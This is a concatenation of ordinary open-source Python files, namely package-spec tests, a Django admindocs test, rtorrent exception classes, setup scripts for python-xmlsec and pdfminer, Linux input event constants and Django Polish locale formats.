                         "./SRPMS/ocaml-cohttp-0.9.8-1.el6.src.rpm")

    def test_binary_package_paths(self):
        # Expected paths depend on the host arch reported by get_rpm_machine().
        machine = get_rpm_machine()
        self.assertEqual(
            sorted(self.spec.binary_package_paths()),
            [
                path.format(machine=machine) for path in
                sorted([
                    "./RPMS/{machine}/ocaml-cohttp-0.9.8-1.el6.{machine}.rpm",
                    "./RPMS/{machine}/ocaml-cohttp-devel-0.9.8-1.el6.{machine}.rpm"])
            ]
        )
class DebTests(unittest.TestCase):
    """Exercises planex.spec.Spec with target='deb' and an RPM->deb name map."""

    def setUp(self):
        # 'setUp' breaks Pylint's naming rules
        # pylint: disable=C0103
        def map_rpm_to_deb(name):
            # Static translation table from RPM package names to their
            # Debian equivalents (one RPM name may map to several debs).
            mapping = {"ocaml-cohttp": ["libcohttp-ocaml"],
                       "ocaml-cohttp-devel": ["libcohttp-ocaml-dev"],
                       "ocaml": ["ocaml-nox", "ocaml-native-compilers"],
                       "ocaml-findlib": ["ocaml-findlib"],
                       "ocaml-re-devel": ["libre-ocaml-dev"],
                       "ocaml-uri-devel": ["liburi-ocaml-dev"],
                       "ocaml-cstruct-devel": ["libcstruct-ocaml-dev"],
                       "ocaml-lwt-devel": ["liblwt-ocaml-dev"],
                       "ocaml-ounit-devel": ["libounit-ocaml-dev"],
                       "ocaml-ocamldoc": ["ocaml-nox"],
                       "ocaml-camlp4-devel": ["camlp4", "camlp4-extra"],
                       "openssl": ["libssl1.0.0"],
                       "openssl-devel": ["libssl-dev"]}
            return mapping[name]

        self.spec = planex.spec.Spec("./tests/data/ocaml-cohttp.spec",
                                     target="deb",
                                     map_name=map_rpm_to_deb)

    def test_name(self):
        self.assertEqual(self.spec.name(), "ocaml-cohttp")

    def test_specpath(self):
        self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")

    def test_version(self):
        self.assertEqual(self.spec.version(), "0.9.8")

    def test_provides(self):
        # Provides are reported under the mapped Debian names.
        self.assertEqual(self.spec.provides(),
                         set(["libcohttp-ocaml", "libcohttp-ocaml-dev"]))

    def test_source_urls(self):
        self.assertEqual(self.spec.source_urls(),
                         ["https://github.com/mirage/ocaml-cohttp/archive/"
                          "ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
                          "file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
                          "ocaml-cohttp-init"])

    def test_source_paths(self):
        self.assertEqual(self.spec.source_paths(),
                         ["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
                          "./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
                          "./SOURCES/ocaml-cohttp-init"])

    def test_buildrequires(self):
        self.assertEqual(self.spec.buildrequires(),
                         set(["ocaml-nox", "ocaml-native-compilers",
                              "ocaml-findlib", "libre-ocaml-dev",
                              "liburi-ocaml-dev", "libcstruct-ocaml-dev",
                              "liblwt-ocaml-dev", "libounit-ocaml-dev",
                              "camlp4", "camlp4-extra", "libssl1.0.0",
                              "libssl-dev"]))

    def test_source_package_path(self):
        self.assertEqual(self.spec.source_package_path(),
                         "./SRPMS/libcohttp-ocaml_0.9.8-1.dsc")

    def test_binary_package_paths(self):
        # Expected paths depend on the host arch reported by get_deb_machine().
        machine = get_deb_machine()
        self.assertEqual(sorted(self.spec.binary_package_paths()),
                         [
                             path.format(machine=machine) for path in
                             sorted(["./RPMS/libcohttp-ocaml_0.9.8-1_{machine}.deb",
                                     "./RPMS/libcohttp-ocaml-dev_0.9.8-1_{machine}.deb"])
                         ]
                         )
|
ptoraskar/django | refs/heads/master | django/contrib/admindocs/tests/test_fields.py | 638 | from __future__ import unicode_literals
import unittest
from django.contrib.admindocs import views
from django.db import models
from django.db.models import fields
from django.utils.translation import ugettext as _
class CustomField(models.Field):
    """Field whose `description` is surfaced by get_readable_field_data_type()."""
    description = "A custom field type"
class DescriptionLackingField(models.Field):
    """Field deliberately lacking a description, to test the fallback text."""
    pass
class TestFieldType(unittest.TestCase):
    """Checks admindocs' get_readable_field_data_type() for builtin and custom fields."""

    def setUp(self):
        pass

    def test_field_name(self):
        # A plain string has no field description to read.
        self.assertRaises(
            AttributeError,
            views.get_readable_field_data_type, "NotAField"
        )

    def test_builtin_fields(self):
        self.assertEqual(
            views.get_readable_field_data_type(fields.BooleanField()),
            _('Boolean (Either True or False)')
        )

    def test_custom_fields(self):
        # A custom description is used verbatim...
        self.assertEqual(
            views.get_readable_field_data_type(CustomField()),
            'A custom field type'
        )
        # ...and a missing one falls back to the generic template.
        self.assertEqual(
            views.get_readable_field_data_type(DescriptionLackingField()),
            _('Field of type: %(field_type)s') % {
                'field_type': 'DescriptionLackingField'
            }
        )
|
nopjmp/SickRage | refs/heads/master | lib/rtorrent/err.py | 182 | # Copyright (c) 2013 Chris Lucas, <chris@chrisjlucas.com>
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from rtorrent.common import convert_version_tuple_to_str
class RTorrentVersionError(Exception):
    """Raised when the connected rTorrent is older than a feature requires."""

    def __init__(self, min_version, cur_version):
        self.min_version = min_version
        self.cur_version = cur_version
        # Human-readable summary, also used as the str() form.
        self.msg = "Minimum version required: {0}".format(
            convert_version_tuple_to_str(min_version))

    def __str__(self):
        return self.msg
class MethodError(Exception):
    """Raised when an rTorrent method call fails or is unsupported."""

    def __init__(self, msg):
        self.msg = msg

    def __str__(self):
        return self.msg
|
concordusapps/python-xmlsec | refs/heads/master | setup.py | 1 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# from __future__ import absolute_import, unicode_literals, division
from os import path
from pkgutil import get_importer
from setuptools import setup, Extension
from functools import wraps
def lazy(function):
    """Decorator deferring a call until its result is actually used.

    Calling the decorated function returns a LazyProxy immediately; the
    underlying function runs on first attribute access (or assignment) and
    the value is cached in ``_result``.
    """
    @wraps(function)
    def wrapped(*args, **kwargs):
        class LazyProxy(object):
            def __init__(self, function, args, kwargs):
                self._function = function
                self._args = args
                self._kwargs = kwargs
                # None doubles as the "not yet evaluated" marker.
                self._result = None

            def __getattribute__(self, name):
                # The proxy's own bookkeeping slots bypass lazy evaluation.
                if name in ['_function', '_args', '_kwargs', '_result']:
                    return super(LazyProxy, self).__getattribute__(name)
                # NOTE(review): a wrapped function that legitimately returns
                # None would be re-invoked on every access -- confirm intended.
                if self._result is None:
                    self._result = self._function(*self._args, **self._kwargs)
                return object.__getattribute__(self._result, name)

            def __setattr__(self, name, value):
                if name in ['_function', '_args', '_kwargs', '_result']:
                    super(LazyProxy, self).__setattr__(name, value)
                    return
                if self._result is None:
                    self._result = self._function(*self._args, **self._kwargs)
                setattr(self._result, name, value)

        return LazyProxy(function, args, kwargs)
    return wrapped
class Extension(Extension, object):
    """setuptools Extension that lazily prepends lxml's include directories.

    Shadows the imported Extension name; subclassing works because the base
    class is resolved before this statement rebinds the name.
    """
    # Guard so the lxml directories are only inserted once per instance/class.
    lxml_extended = False

    @property
    def include_dirs(self):
        dirs = self.__dict__['include_dirs']
        if self.lxml_extended:
            return dirs
        # Resolve lxml include directories.
        # Imported here so lxml only needs to be installed at build time.
        import lxml
        lxml_base = path.dirname(lxml.__file__)
        lxml_include = path.join(lxml_base, 'includes')
        dirs.insert(0, lxml_include)
        dirs.insert(0, lxml_base)
        self.lxml_extended = True
        return dirs

    @include_dirs.setter
    def include_dirs(self, dirs):
        # Store directly in the instance dict; the base __init__ assigns
        # include_dirs, which routes through this setter.
        self.__dict__['include_dirs'] = dirs
@lazy
def make_extension(name, cython=True):
    """Build an Extension for *name*, resolving flags via pkg-config.

    Lazy so pkgconfig/lxml are only touched when setuptools actually
    builds the extension modules.
    """
    from pkgconfig import parse
    # Declare the crypto implementation.
    XMLSEC_CRYPTO = 'openssl'
    # Process the `pkg-config` utility and discover include and library
    # directories.
    config = {}
    for lib in ['libxml-2.0', 'xmlsec1-%s' % XMLSEC_CRYPTO]:
        config.update(parse(lib))
    # List-ify config for setuptools.
    for key in config:
        config[key] = list(config[key])
    # Add the source directories for inclusion.
    config['include_dirs'].insert(0, 'src')
    # Resolve extension location from name.
    location = path.join('src', *name.split('.'))
    location += '.pyx' if cython else '.c'
    # Create and return the extension.
    return Extension(name, [location], **config)
# Navigate, import, and retrieve the metadata of the project.
meta = get_importer('src/xmlsec').find_module('meta').load_module('meta')

# Package definition; extension modules are built lazily via make_extension.
setup(
    name='xmlsec',
    version=meta.version,
    description=meta.description,
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Cython',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.3',
        'Topic :: Text Processing :: Markup :: XML'
    ],
    author='Concordus Applications',
    author_email='support@concordusapps.com',
    url='https://github.com/concordusapps/python-xmlsec',
    setup_requires=[
        'setuptools_cython',
        'pkgconfig',
        'lxml >= 3.0',
    ],
    install_requires=[
        'lxml >= 3.0',
    ],
    extras_require={
        'test': ['pytest']
    },
    package_dir={'xmlsec': 'src/xmlsec'},
    packages=['xmlsec'],
    ext_modules=[
        make_extension('xmlsec.constants'),
        make_extension('xmlsec.utils'),
        make_extension('xmlsec.tree'),
        make_extension('xmlsec.key'),
        make_extension('xmlsec.ds'),
        make_extension('xmlsec.template'),
    ]
)
|
mpasternak/pyglet-fix-issue-518-522 | refs/heads/master | experimental/input/linux_const.py | 28 | #!/usr/bin/env python
'''Event constants from /usr/include/linux/input.h
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
# Synchronization events.
SYN_REPORT = 0
SYN_CONFIG = 1
# Keys and buttons
KEY_RESERVED = 0
KEY_ESC = 1
KEY_1 = 2
KEY_2 = 3
KEY_3 = 4
KEY_4 = 5
KEY_5 = 6
KEY_6 = 7
KEY_7 = 8
KEY_8 = 9
KEY_9 = 10
KEY_0 = 11
KEY_MINUS = 12
KEY_EQUAL = 13
KEY_BACKSPACE = 14
KEY_TAB = 15
KEY_Q = 16
KEY_W = 17
KEY_E = 18
KEY_R = 19
KEY_T = 20
KEY_Y = 21
KEY_U = 22
KEY_I = 23
KEY_O = 24
KEY_P = 25
KEY_LEFTBRACE = 26
KEY_RIGHTBRACE = 27
KEY_ENTER = 28
KEY_LEFTCTRL = 29
KEY_A = 30
KEY_S = 31
KEY_D = 32
KEY_F = 33
KEY_G = 34
KEY_H = 35
KEY_J = 36
KEY_K = 37
KEY_L = 38
KEY_SEMICOLON = 39
KEY_APOSTROPHE = 40
KEY_GRAVE = 41
KEY_LEFTSHIFT = 42
KEY_BACKSLASH = 43
KEY_Z = 44
KEY_X = 45
KEY_C = 46
KEY_V = 47
KEY_B = 48
KEY_N = 49
KEY_M = 50
KEY_COMMA = 51
KEY_DOT = 52
KEY_SLASH = 53
KEY_RIGHTSHIFT = 54
KEY_KPASTERISK = 55
KEY_LEFTALT = 56
KEY_SPACE = 57
KEY_CAPSLOCK = 58
KEY_F1 = 59
KEY_F2 = 60
KEY_F3 = 61
KEY_F4 = 62
KEY_F5 = 63
KEY_F6 = 64
KEY_F7 = 65
KEY_F8 = 66
KEY_F9 = 67
KEY_F10 = 68
KEY_NUMLOCK = 69
KEY_SCROLLLOCK = 70
KEY_KP7 = 71
KEY_KP8 = 72
KEY_KP9 = 73
KEY_KPMINUS = 74
KEY_KP4 = 75
KEY_KP5 = 76
KEY_KP6 = 77
KEY_KPPLUS = 78
KEY_KP1 = 79
KEY_KP2 = 80
KEY_KP3 = 81
KEY_KP0 = 82
KEY_KPDOT = 83
KEY_ZENKAKUHANKAKU = 85
KEY_102ND = 86
KEY_F11 = 87
KEY_F12 = 88
KEY_RO = 89
KEY_KATAKANA = 90
KEY_HIRAGANA = 91
KEY_HENKAN = 92
KEY_KATAKANAHIRAGANA = 93
KEY_MUHENKAN = 94
KEY_KPJPCOMMA = 95
KEY_KPENTER = 96
KEY_RIGHTCTRL = 97
KEY_KPSLASH = 98
KEY_SYSRQ = 99
KEY_RIGHTALT = 100
KEY_LINEFEED = 101
KEY_HOME = 102
KEY_UP = 103
KEY_PAGEUP = 104
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_END = 107
KEY_DOWN = 108
KEY_PAGEDOWN = 109
KEY_INSERT = 110
KEY_DELETE = 111
KEY_MACRO = 112
KEY_MUTE = 113
KEY_VOLUMEDOWN = 114
KEY_VOLUMEUP = 115
KEY_POWER = 116
KEY_KPEQUAL = 117
KEY_KPPLUSMINUS = 118
KEY_PAUSE = 119
KEY_KPCOMMA = 121
KEY_HANGUEL = 122
KEY_HANJA = 123
KEY_YEN = 124
KEY_LEFTMETA = 125
KEY_RIGHTMETA = 126
KEY_COMPOSE = 127
KEY_STOP = 128
KEY_AGAIN = 129
KEY_PROPS = 130
KEY_UNDO = 131
KEY_FRONT = 132
KEY_COPY = 133
KEY_OPEN = 134
KEY_PASTE = 135
KEY_FIND = 136
KEY_CUT = 137
KEY_HELP = 138
KEY_MENU = 139
KEY_CALC = 140
KEY_SETUP = 141
KEY_SLEEP = 142
KEY_WAKEUP = 143
KEY_FILE = 144
KEY_SENDFILE = 145
KEY_DELETEFILE = 146
KEY_XFER = 147
KEY_PROG1 = 148
KEY_PROG2 = 149
KEY_WWW = 150
KEY_MSDOS = 151
KEY_COFFEE = 152
KEY_DIRECTION = 153
KEY_CYCLEWINDOWS = 154
KEY_MAIL = 155
KEY_BOOKMARKS = 156
KEY_COMPUTER = 157
KEY_BACK = 158
KEY_FORWARD = 159
KEY_CLOSECD = 160
KEY_EJECTCD = 161
KEY_EJECTCLOSECD = 162
KEY_NEXTSONG = 163
KEY_PLAYPAUSE = 164
KEY_PREVIOUSSONG = 165
KEY_STOPCD = 166
KEY_RECORD = 167
KEY_REWIND = 168
KEY_PHONE = 169
KEY_ISO = 170
KEY_CONFIG = 171
KEY_HOMEPAGE = 172
KEY_REFRESH = 173
KEY_EXIT = 174
KEY_MOVE = 175
KEY_EDIT = 176
KEY_SCROLLUP = 177
KEY_SCROLLDOWN = 178
KEY_KPLEFTPAREN = 179
KEY_KPRIGHTPAREN = 180
KEY_F13 = 183
KEY_F14 = 184
KEY_F15 = 185
KEY_F16 = 186
KEY_F17 = 187
KEY_F18 = 188
KEY_F19 = 189
KEY_F20 = 190
KEY_F21 = 191
KEY_F22 = 192
KEY_F23 = 193
KEY_F24 = 194
KEY_PLAYCD = 200
KEY_PAUSECD = 201
KEY_PROG3 = 202
KEY_PROG4 = 203
KEY_SUSPEND = 205
KEY_CLOSE = 206
KEY_PLAY = 207
KEY_FASTFORWARD = 208
KEY_BASSBOOST = 209
KEY_PRINT = 210
KEY_HP = 211
KEY_CAMERA = 212
KEY_SOUND = 213
KEY_QUESTION = 214
KEY_EMAIL = 215
KEY_CHAT = 216
KEY_SEARCH = 217
KEY_CONNECT = 218
KEY_FINANCE = 219
KEY_SPORT = 220
KEY_SHOP = 221
KEY_ALTERASE = 222
KEY_CANCEL = 223
KEY_BRIGHTNESSDOWN = 224
KEY_BRIGHTNESSUP = 225
KEY_MEDIA = 226
KEY_UNKNOWN = 240
BTN_MISC = 0x100
BTN_0 = 0x100
BTN_1 = 0x101
BTN_2 = 0x102
BTN_3 = 0x103
BTN_4 = 0x104
BTN_5 = 0x105
BTN_6 = 0x106
BTN_7 = 0x107
BTN_8 = 0x108
BTN_9 = 0x109
BTN_MOUSE = 0x110
BTN_LEFT = 0x110
BTN_RIGHT = 0x111
BTN_MIDDLE = 0x112
BTN_SIDE = 0x113
BTN_EXTRA = 0x114
BTN_FORWARD = 0x115
BTN_BACK = 0x116
BTN_TASK = 0x117
BTN_JOYSTICK = 0x120
BTN_TRIGGER = 0x120
BTN_THUMB = 0x121
BTN_THUMB2 = 0x122
BTN_TOP = 0x123
BTN_TOP2 = 0x124
BTN_PINKIE = 0x125
BTN_BASE = 0x126
BTN_BASE2 = 0x127
BTN_BASE3 = 0x128
BTN_BASE4 = 0x129
BTN_BASE5 = 0x12a
BTN_BASE6 = 0x12b
BTN_DEAD = 0x12f
BTN_GAMEPAD = 0x130
BTN_A = 0x130
BTN_B = 0x131
BTN_C = 0x132
BTN_X = 0x133
BTN_Y = 0x134
BTN_Z = 0x135
BTN_TL = 0x136
BTN_TR = 0x137
BTN_TL2 = 0x138
BTN_TR2 = 0x139
BTN_SELECT = 0x13a
BTN_START = 0x13b
BTN_MODE = 0x13c
BTN_THUMBL = 0x13d
BTN_THUMBR = 0x13e
BTN_DIGI = 0x140
BTN_TOOL_PEN = 0x140
BTN_TOOL_RUBBER = 0x141
BTN_TOOL_BRUSH = 0x142
BTN_TOOL_PENCIL = 0x143
BTN_TOOL_AIRBRUSH = 0x144
BTN_TOOL_FINGER = 0x145
BTN_TOOL_MOUSE = 0x146
BTN_TOOL_LENS = 0x147
BTN_TOUCH = 0x14a
BTN_STYLUS = 0x14b
BTN_STYLUS2 = 0x14c
BTN_TOOL_DOUBLETAP = 0x14d
BTN_TOOL_TRIPLETAP = 0x14e
BTN_WHEEL = 0x150
BTN_GEAR_DOWN = 0x150
BTN_GEAR_UP = 0x151
KEY_OK = 0x160
KEY_SELECT = 0x161
KEY_GOTO = 0x162
KEY_CLEAR = 0x163
KEY_POWER2 = 0x164
KEY_OPTION = 0x165
KEY_INFO = 0x166
KEY_TIME = 0x167
KEY_VENDOR = 0x168
KEY_ARCHIVE = 0x169
KEY_PROGRAM = 0x16a
KEY_CHANNEL = 0x16b
KEY_FAVORITES = 0x16c
KEY_EPG = 0x16d
KEY_PVR = 0x16e
KEY_MHP = 0x16f
KEY_LANGUAGE = 0x170
KEY_TITLE = 0x171
KEY_SUBTITLE = 0x172
KEY_ANGLE = 0x173
KEY_ZOOM = 0x174
KEY_MODE = 0x175
KEY_KEYBOARD = 0x176
KEY_SCREEN = 0x177
KEY_PC = 0x178
KEY_TV = 0x179
KEY_TV2 = 0x17a
KEY_VCR = 0x17b
KEY_VCR2 = 0x17c
KEY_SAT = 0x17d
KEY_SAT2 = 0x17e
KEY_CD = 0x17f
KEY_TAPE = 0x180
KEY_RADIO = 0x181
KEY_TUNER = 0x182
KEY_PLAYER = 0x183
KEY_TEXT = 0x184
KEY_DVD = 0x185
KEY_AUX = 0x186
KEY_MP3 = 0x187
KEY_AUDIO = 0x188
KEY_VIDEO = 0x189
KEY_DIRECTORY = 0x18a
KEY_LIST = 0x18b
KEY_MEMO = 0x18c
KEY_CALENDAR = 0x18d
KEY_RED = 0x18e
KEY_GREEN = 0x18f
KEY_YELLOW = 0x190
KEY_BLUE = 0x191
KEY_CHANNELUP = 0x192
KEY_CHANNELDOWN = 0x193
KEY_FIRST = 0x194
KEY_LAST = 0x195
KEY_AB = 0x196
KEY_NEXT = 0x197
KEY_RESTART = 0x198
KEY_SLOW = 0x199
KEY_SHUFFLE = 0x19a
KEY_BREAK = 0x19b
KEY_PREVIOUS = 0x19c
KEY_DIGITS = 0x19d
KEY_TEEN = 0x19e
KEY_TWEN = 0x19f
KEY_DEL_EOL = 0x1c0
KEY_DEL_EOS = 0x1c1
KEY_INS_LINE = 0x1c2
KEY_DEL_LINE = 0x1c3
KEY_FN = 0x1d0
KEY_FN_ESC = 0x1d1
KEY_FN_F1 = 0x1d2
KEY_FN_F2 = 0x1d3
KEY_FN_F3 = 0x1d4
KEY_FN_F4 = 0x1d5
KEY_FN_F5 = 0x1d6
KEY_FN_F6 = 0x1d7
KEY_FN_F7 = 0x1d8
KEY_FN_F8 = 0x1d9
KEY_FN_F9 = 0x1da
KEY_FN_F10 = 0x1db
KEY_FN_F11 = 0x1dc
KEY_FN_F12 = 0x1dd
KEY_FN_1 = 0x1de
KEY_FN_2 = 0x1df
KEY_FN_D = 0x1e0
KEY_FN_E = 0x1e1
KEY_FN_F = 0x1e2
KEY_FN_S = 0x1e3
KEY_FN_B = 0x1e4
KEY_MAX = 0x1ff
# Relative axes
REL_X = 0x00
REL_Y = 0x01
REL_Z = 0x02
REL_RX = 0x03
REL_RY = 0x04
REL_RZ = 0x05
REL_HWHEEL = 0x06
REL_DIAL = 0x07
REL_WHEEL = 0x08
REL_MISC = 0x09
REL_MAX = 0x0f
# Absolute axes
ABS_X = 0x00
ABS_Y = 0x01
ABS_Z = 0x02
ABS_RX = 0x03
ABS_RY = 0x04
ABS_RZ = 0x05
ABS_THROTTLE = 0x06
ABS_RUDDER = 0x07
ABS_WHEEL = 0x08
ABS_GAS = 0x09
ABS_BRAKE = 0x0a
ABS_HAT0X = 0x10
ABS_HAT0Y = 0x11
ABS_HAT1X = 0x12
ABS_HAT1Y = 0x13
ABS_HAT2X = 0x14
ABS_HAT2Y = 0x15
ABS_HAT3X = 0x16
ABS_HAT3Y = 0x17
ABS_PRESSURE = 0x18
ABS_DISTANCE = 0x19
ABS_TILT_X = 0x1a
ABS_TILT_Y = 0x1b
ABS_TOOL_WIDTH = 0x1c
ABS_VOLUME = 0x20
ABS_MISC = 0x28
ABS_MAX = 0x3f
# Misc events
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
# LEDs
LED_NUML = 0x00
LED_CAPSL = 0x01
LED_SCROLLL = 0x02
LED_COMPOSE = 0x03
LED_KANA = 0x04
LED_SLEEP = 0x05
LED_SUSPEND = 0x06
LED_MUTE = 0x07
LED_MISC = 0x08
LED_MAIL = 0x09
LED_CHARGING = 0x0a
LED_MAX = 0x0f
# Autorepeat values
REP_DELAY = 0x00
REP_PERIOD = 0x01
REP_MAX = 0x01
# Sounds
SND_CLICK = 0x00
SND_BELL = 0x01
SND_TONE = 0x02
SND_MAX = 0x07
# IDs.
ID_BUS = 0
ID_VENDOR = 1
ID_PRODUCT = 2
ID_VERSION = 3
BUS_PCI = 0x01
BUS_ISAPNP = 0x02
BUS_USB = 0x03
BUS_HIL = 0x04
BUS_BLUETOOTH = 0x05
BUS_ISA = 0x10
BUS_I8042 = 0x11
BUS_XTKBD = 0x12
BUS_RS232 = 0x13
BUS_GAMEPORT = 0x14
BUS_PARPORT = 0x15
BUS_AMIGA = 0x16
BUS_ADB = 0x17
BUS_I2C = 0x18
BUS_HOST = 0x19
# Values describing the status of an effect
FF_STATUS_STOPPED = 0x00
FF_STATUS_PLAYING = 0x01
FF_STATUS_MAX = 0x01
|
HIPERCUBE/ReturnA | refs/heads/master | DataCrawler/lib/build/lib/pdfminer/setup.py | 5 | #!/usr/bin/env python
from distutils.core import setup
from pdfminer import __version__
# Package metadata for pdfminer. Runs distutils' setup() at import time,
# as is conventional for a setup.py script.
# NOTE(review): distutils is deprecated (removed from the stdlib in
# Python 3.12) — consider migrating to setuptools; verify the target
# Python versions before changing.
setup(
    name='pdfminer',
    # Version is taken from the package itself so it is defined in one place.
    version=__version__,
    description='PDF parser and analyzer',
    long_description='''PDFMiner is a tool for extracting information from PDF documents.
Unlike other PDF-related tools, it focuses entirely on getting
and analyzing text data. PDFMiner allows to obtain
the exact location of texts in a page, as well as
other information such as fonts or lines.
It includes a PDF converter that can transform PDF files
into other text formats (such as HTML). It has an extensible
PDF parser that can be used for other purposes instead of text analysis.''',
    license='MIT/X',
    author='Yusuke Shinyama',
    author_email='yusuke at cs dot nyu dot edu',
    url='http://euske.github.io/pdfminer/index.html',
    # Only the single 'pdfminer' package is shipped.
    packages=[
        'pdfminer',
    ],
    # Bundle the pre-built CMap tables needed for CJK font decoding.
    package_data={
        'pdfminer': ['cmap/*.pickle.gz']
    },
    # Command-line entry points installed as plain scripts.
    scripts=[
        'tools/pdf2txt.py',
        'tools/dumppdf.py',
        'tools/latin2ascii.py',
    ],
    keywords=['pdf parser', 'pdf converter', 'layout analysis', 'text mining'],
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: MIT License',
        'Topic :: Text Processing',
    ],
)
|
marcelocure/django | refs/heads/master | django/conf/locale/pl/formats.py | 504 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
# Display formats (Django date-format syntax, see the module header note).
DATE_FORMAT = 'j E Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j E Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j F'
SHORT_DATE_FORMAT = 'd-m-Y'
SHORT_DATETIME_FORMAT = 'd-m-Y H:i'
FIRST_DAY_OF_WEEK = 1  # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Accepted parse formats; tried in order, so more specific forms come first.
DATE_INPUT_FORMATS = [
    '%d.%m.%Y', '%d.%m.%y',     # '25.10.2006', '25.10.06'
    '%y-%m-%d',                 # '06-10-25'
    # '%d. %B %Y', '%d. %b. %Y',  # '25. October 2006', '25. Oct. 2006'
]
DATETIME_INPUT_FORMATS = [
    '%d.%m.%Y %H:%M:%S',        # '25.10.2006 14:30:59'
    '%d.%m.%Y %H:%M:%S.%f',     # '25.10.2006 14:30:59.000200'
    '%d.%m.%Y %H:%M',           # '25.10.2006 14:30'
    '%d.%m.%Y',                 # '25.10.2006'
]
# Number formatting: Polish uses ',' as the decimal mark and a
# non-breaking-style space to group thousands, three digits per group.
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = ' '
NUMBER_GROUPING = 3
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.